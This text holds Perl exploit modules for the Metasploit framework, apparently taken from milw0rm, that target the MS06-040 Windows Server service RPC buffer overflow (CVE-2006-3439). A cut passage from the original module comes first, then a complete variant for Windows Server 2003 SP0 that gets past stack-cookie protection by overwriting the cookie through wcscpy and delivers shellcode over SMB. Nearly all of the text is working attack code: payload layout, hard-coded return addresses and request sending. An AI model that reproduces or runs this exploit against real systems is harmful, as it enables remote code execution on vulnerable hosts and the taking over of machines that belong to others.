our shellcode out with nops $shellcode = $self->MakeNops($target->[1] - length($shellcode)) . $shellcode; # Stick it into a path my $path = $shellcode . (pack('V', $target->[2]) x 16) . "\x00\x00"; # Package that into a stub $stub = Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::UnicodeConformantVaryingString(''). Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path). Pex::NDR::Long(int(rand(250)+1)). Pex::NDR::UnicodeConformantVaryingStringPreBuilt( "\xeb\x02" . "\x00\x00"). Pex::NDR::Long(int(rand(250)+1)). Pex::NDR::Long(0); # # Use the wcscpy() method on XP SP0/SP1 # } elsif ($target->[0] =~ /XP/ && ! $target->[3]) { # XP SP0/SP1 my $path = # Shellcode (corrupted ~420 bytes in) $shellcode. # Padding Pex::Text::AlphaNumText($target->[1] - length($shellcode)). # Land 6 bytes in to bypass garbage (XP SP0) pack('V', $target->[2] + 6). # Padding Pex::Text::AlphaNumText(8). # Address to write our shellcode (XP SP0) pack('V', $target->[2]). # Padding (required) Pex::Text::AlphaNumText(32). # Jump straight to shellcode (XP SP1) pack('V', $target->[2]). # Padding Pex::Text::AlphaNumText(8). # Address to write our shellcode (XP SP1) pack('V', $target->[2]). # Padding (required) Pex::Text::AlphaNumText(32). # Terminate "\x00\x00"; # Package that into a stub $stub = Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::UnicodeConformantVaryingString(''). Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path). Pex::NDR::Long(int(rand(250)+1)). Pex::NDR::UnicodeConformantVaryingString(''). Pex::NDR::Long(int(rand(250)+1)). Pex::NDR::Long(0); # # Use the stack overflow method if a return address is set # } elsif( $target->[3]) { my $buff = Pex::Text::AlphaNumText(800); substr($buff, 0, length($shellcode), $shellcode); substr($buff, $target->[1], 4, pack('V', $target->[3])); substr($buff, $target->[2], 5, "\xe9" . pack('V', ($target->[1] + 5) * -1 )); my $path = "\\\x00\\\x00". $buff. "\x00\x00"; # Package that into a stub $stub = Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::UnicodeConformantVaryingString(''). Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path). Pex::NDR::Long(int(rand(250)+1)). Pex::NDR::UnicodeConformantVaryingString(''). Pex::NDR::Long(int(rand(250)+1)). Pex::NDR::Long(0); } else { $self->PrintLine("This target is not currently supported"); return; } $self->PrintLine("[*] Sending request..."); # Function 0x1f is not the only way to exploit this :-) my @response = $dce->request( $handle, 0x1f, $stub ); if ( length($dce->{'response'}->{'StubData'}) > 0) { $self->PrintLine("[*] The server rejected it, trying again..."); @response = $dce->request( $handle, 0x1f, $stub ); } if ( length($dce->{'response'}->{'StubData'}) > 0) { $self->PrintLine("[*] This system may be patched or running Windows XP SP1 or SP2"); } if (@response) { $self->PrintLine('[*] RPC server responded with:'); foreach my $line (@response) { $self->PrintLine( '[*] ' . $line ); } } return; } 1; # milw0rm.com [2006-08-10]

######################################################################### # netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0) # # Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com> # # http://sf-freedom.blogspot.com # # For educational purpose only # # Note: This exploit is developed because of my question "Is it exploitable # on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows # Server 2003 SP1 is not exploitable because they are compiled with /GS, but # how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there # is no Windows Server 2003 sp0 target, this means 2003 SP0 is not # exploitable ? There is Stack Protection Windows Server 2003, is this the # reasons why there is no Windows Server 2003 SP0 exploit for MS06-040 ? # # I start to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him # ^-^) and work on it. The problem is the Stack Protection "security cookie # checking". Because wcscpy() method allow me to write to any memory location # that are marked writable, I decide to write to the location at "security # cookie" is stored and it works !!! I will describe more implementation details # in my blog in few days ^-^ # # This exploit tested on Windows Server 2003 SP0 build 3790 and successful # exploit 2003 machine in my environment - all patch before MS06-040 # (KB921883). It's quite reliable but not 100%. There is the possibility that # the exploit will fail and the target system process crash. Because I have # only one testbase system, I couldn't confirm this exploit will work on # your environment. However feel free to e-mail to me. # # Credits: H D Moore ######################################################################### package Msf::Exploit::netapi_win2003; use base "Msf::Exploit"; use strict; use Pex::DCERPC; use Pex::NDR; my $advanced = { 'FragSize' => [ 256, 'The DCERPC fragment size' ], 'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ], 'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ], }; my $info = { 'Name' => 'MSO6-040 Windows Server 2003 Target', 'Version' => '', 'Authors' => [ 'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>', ], 'Arch' => ['x86'], 'OS' => [ 'win32', 'win2003' ], 'Priv' => 1, 'AutoOpts' => { 'EXITFUNC' => 'thread' }, 'UserOpts' => { 'RHOST' => [ 1, 'ADDR', 'The target address' ], # SMB connection options 'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ], 'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ], 'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ], }, 'Payload' => { # Technically we can use more space than this, but by limiting it # to 370 bytes we can use the same request for all Windows SPs. 'Space' => 370, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 'Keys' => ['+ws2ord'], # sub esp, 4097 + inc esp makes stack happy 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Description' => Pex::Text::Freeform( qq{ This exploit modified from netapi_ms06_040.pm (Metasploit). While netapi_ms06_040 of metasploit works on Windows 2000 SP0 - SP4 and Windows XP SP0 - SP1, this exploit works on Windows Server 2003 SP0. } ), 'Refs' => [ [ 'BID', '19409' ], [ 'CVE', '2006-3439' ], [ 'MSB', 'MS06-040' ], ], 'DefaultTarget' => 0, 'Targets' => [ [ '(wcscpy) Windows Server 2003 SP0', 612], ], 'Keys' => ['srvsvc'], 'DisclosureDate' => '', }; sub new { my ($class) = @_; my $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ ); return ($self); } sub Exploit { my ($self) = @_; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target_name = '*SMBSERVER'; my $FragSize = $self->GetVar('FragSize') || 256; my $target = $self->Targets->[$target_idx]; if (!$self->InitNops(128)) { $self->PrintLine("Could not initialize the nop module"); return; } my ( $res, $rpc ); my $pipe = '\BROWSER'; my $uuid = '4b324fc8-1670-01d3-1278-5a47bf6ee188'; my $version = '3.0'; my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe ); my $dce = Pex::DCERPC->new( 'handle' => $handle, 'username' => $self->GetVar('SMBUSER'), 'password' => $self->GetVar('SMBPASS'), 'domain' => $self->GetVar('SMBDOM'), 'fragsize' => $self->GetVar('FragSize'), 'bindevasion' => $self->GetVar('BindEvasion'), 'directsmb' => $self->GetVar('DirectSMB'), ); if ( !$dce ) { $self->PrintLine("[*] Could not bind to $handle"); return; } my $smb = $dce->{'_handles'}{$handle}{'connection'}; if (! $smb) { $self->PrintLine("[*] Could not establish SMB session"); return; } my $stub; # # Use the wcscpy() method on Windows Server 2003 SP0 # if ($target->[0] =~ /2003/) { my $path = $shellcode. # Padding Pex::Text::AlphaNumText($target->[1] - length($shellcode)). Pex::Text::AlphaNumText(32). substr($shellcode, 0, 4). # cookie Pex::Text::AlphaNumText(4). # return address == address that store security cookie ("\xec\xc1\xc8\x71") . Pex::Text::AlphaNumText(8). ("\xec\xc1\xc8\x71" x 2) . Pex::Text::AlphaNumText(36). # Terminate "\x00\x00"; # Package that into a stub $stub = Pex::NDR::Long(int(rand(0xffffffff))). Pex::NDR::UnicodeConformantVaryingString(''). Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path). Pex::NDR::Long(int(rand(250)+1)). Pex::NDR::UnicodeConformantVaryingString(''). Pex::NDR::Long(int(rand(250)+1)). Pex::NDR::Long(0); } else { $self->PrintLine("This target is not currently supported"); return; } $self->PrintLine("[*] Sending request..."); # Function 0x1f is not the only way to exploit this :-) my @response = $dce->request( $handle, 0x1f, $stub ); if ( length($dce->{'response'}->{'StubData'}) > 0) { $self->PrintLine("[*] The server rejected it, trying again..."); @response = $dce->request( $handle, 0x1f, $stub ); } if ( length($dce->{'response'}->{'StubData'}) > 0) { $self->PrintLine("[*] Exploit Failed"); } if (@response) { $self->PrintLine('[*] RPC server responded with:'); foreach my $line (@response) { $self->PrintLine( '[*] ' . $line ); } } return; } 1; # milw0rm.com [2006-09-13]